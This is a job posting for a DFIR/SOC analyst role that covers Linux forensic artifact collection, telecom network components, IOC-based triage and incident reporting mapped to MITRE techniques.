DFIR/SOC Analyst

Job Description

DFIR/SOC Analyst · Expertise in Forensic Log Collection on Linux Machines · Proficient in acquiring system-level artifacts from Linux environments for digital forensic analysis. · Usage of Unix-like artifact collectors such as UAC (Unix Artifact Collector), Log2Timeline, Volatility, FTK, Encase, Eric Zimmerman's tools. · Development of Customized Scripts · Tailoring the default UAC script to fit specific incident response or investigation use cases including the Application logs. · Performance tuning to minimize system impact during live data acquisition. · Custom scripts for parsing and pattern based detection (Python, Bash, etc.) · Strong Understanding of Telecom Components · Familiarity with core telecom infrastructure such as: · Signaling systems (SS7, SIP, Diameter) · Network elements (MME, PGW, SGW, SIGTRAN, SPF, AMF, UPF, MSC, HLR, VLR, UDC, GTP etc.) · Bulk Analysis of Collected Artifacts · Triaging and prioritizing systems based on severity and presence of confirmed IOCs or TTPs. · Investigating a large number of systems in bulk using collected artifacts from Linux systems. · Leveraging automation and scripting (e.g., Python, Bash, YARA rules) to efficiently parse and analyze forensic data. · Identifying Indicators of Compromise (IOCs), suspicious behavior patterns, and anomaly detection. · Suspicious behavior patterns, including lateral movement, privilege escalation, and anomalous process execution. · Persistence mechanisms (e.g., rootkits, startup script modifications, backdoored binaries). · Timestamps for tampering or time-skewing to detect anti-forensic behavior. · Correlation of events across systems and timeframes to establish timelines and root causes. · Identification of Unauthorized Access, Unauthorized Configuration related changes, Malicious binaries, Persistence, Data Exfiltration, etc. · Support in post-incident activities such as RCA sessions or tabletop exercises. · Validation of Password reset activities. · Documentation and Reporting · Compilation of forensic findings into a structured and comprehensive report, including: • Executive summary • Technical findings with evidence • Timeline of events • Mapping the detections to MITRE TTPs • Recommendations for remediation and mitigation • Use case recommendation based on the TTPs. • Maintenance of internal documentation to support audit trails and reproducibility of analysis. · Interpersonal Skills · Ability to communicate complex technical findings effectively to both technical and non-technical audiences · Strong analytical and problem-solving skills, with attention to detail and accuracy · Self-driven and able to work effectively in high-stress situations, handling multiple incidents simultaneously · Demonstrated ability to work both independently and collaboratively within a team · Flexible in Shifts Show more Show less